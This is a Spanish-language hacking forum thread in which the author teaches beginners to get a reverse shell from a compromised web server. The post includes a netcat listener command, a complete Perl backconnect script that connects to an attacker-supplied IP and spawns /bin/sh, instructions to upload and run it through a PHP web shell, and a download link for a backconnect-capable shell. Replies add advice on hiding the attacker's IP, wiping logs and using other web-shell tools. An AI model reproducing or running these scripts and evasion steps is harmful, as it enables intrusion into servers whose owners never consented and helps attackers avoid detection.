Hola, Ya de regreso por este foro tan bello :D Publicare un pequeño tuto de una forma de hacer backconect con CMD (Windows) & Una shell en algun servidor...
Ok lo primero que haremos sera habrir el cmd y ejecutar el netcat
¿Como? Ok les explico...
Bajamos el Netcat http://www.sendspace.com/file/y6h4z2
Lo metemos al disco C renombrandolo nc
Ok ahora habrimos cmd y ejecutamos cd.. dos veces para que quede asi:
(http://i.imgur.com/15BjD.png)
Despues de eso ejecutamos cd nc Nos quedaria algo asi
(http://i.imgur.com/wgSPT.png)
Ok ya tenemos el Netcat abierto ahora le diremos Pon ala escucha "Tal puerto" ¿Como? Ejecutando el comando nc -lnvp puerto, En mi caso seria nc -lnvp 113
Quedaria asi:
(http://i.imgur.com/178Sk.png)
Ok ya tenemos ala escucha el puerto...
Ahora nos bajamos un Backdoor.. yo usare este
#By xDarkSton3x
#2011
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "########################################\n";
print "# Back Connect Script By xDarkSton3x #\n";
print "########################################\n";
system("/bin/sh -i");
#Contact: [email protected]
(Esta en Perl)
Ok ahora subimos a nuestra phpshell el script con nombre.txt ejemplo back.txt
(http://i.imgur.com/DnqPT.png)
Ya que tenemos arriva el back.txt vamos a ejecutar un comando y ejecutamos...
perl back.txt ip puerto Asi:
(http://i.imgur.com/7gRa2.png)
Despues de eso deveriamos recivir en el netcat algo asi...
(http://i.imgur.com/VgbDJ.png)
Si se quieren ahorrar lo de el script en perl les dejo una shell con opcion de backconect donde solo pones tu ip y el puerto y te llega al netcat
(http://i.imgur.com/2hpFq.png)
La shell es:
http://www.sendspace.com/file/1rhnpt
(No la pongo en code porque no permite tantos caracteres)
Saludos
Perfecto man , me viene al pelo xd.
Un placer volver a verte activo y vivo O.o
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
y la ip completamente visible en los logs xD
Podrias hacer tu un tutorial y enseñas a no mostrarlos ::)
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
y la ip completamente visible en los logs xD
Esto no es un post donde enseño a dejar invisible la ip en los logs, Lee el titulo. SOLO ENSEÑA A HACER UNA BACKCONECT.
Ping no-ip...
Y ya esta , con la no ip no haces una mierda no sea te la crees desde un vpn que te coje otras dns y aun asi pueden adivinar tu ip real.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
pero hay que ser responsable y no ensñar a niños a cojer y no advirtirles de sida o embarazos x) yo se que no tienes etica pero es de esperarse de un defacer y no de un pentester;)
y para ocultar el ip es tan facil como un no-ip que para eso se ocupaba realmente antes en back connect y no para andar de lammerto crea botnets ;)
Amen!
Por otro lado si quieren que no se les reconozca su ip, tunelizen y eliminen logs!
Que tan dificil es usar un buen zapper y listo ._.
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.
Realmente este post es para principiantes.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.
Realmente este post es para principiantes.
No todos nacen sabiendo.
Ya es tiempo de actualizarse.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Con WeBacoo o Weevely, así el servidor tenga Firewall o no tenga el Netcat, de igual forma se puede obtener un Reverse Shell de manera mas rápida y avanzada.
Realmente este post es para principiantes.
No todos nacen sabiendo.
Ya es tiempo de actualizarse.
Quize decir que algunos, recien estan aprendiendo... y a lo mejor esto le sirva de mucho o tal vez no, pero siempre y cuando sea para aprender no esta de mas...
CitarQuize decir que algunos, recien estan aprendiendo... y a lo mejor esto le sirva de mucho o tal vez no, pero siempre y cuando sea para aprender no esta de mas...
Si de hecho, mi respuesta en este tema fue con la intención de mostrar otro "método" para obtener el mismo resultado de una forma avanzada. Por lo tanto no fue con la intención de desprestigiar el post.
Buen Aporte Okol . Gracias por compartir info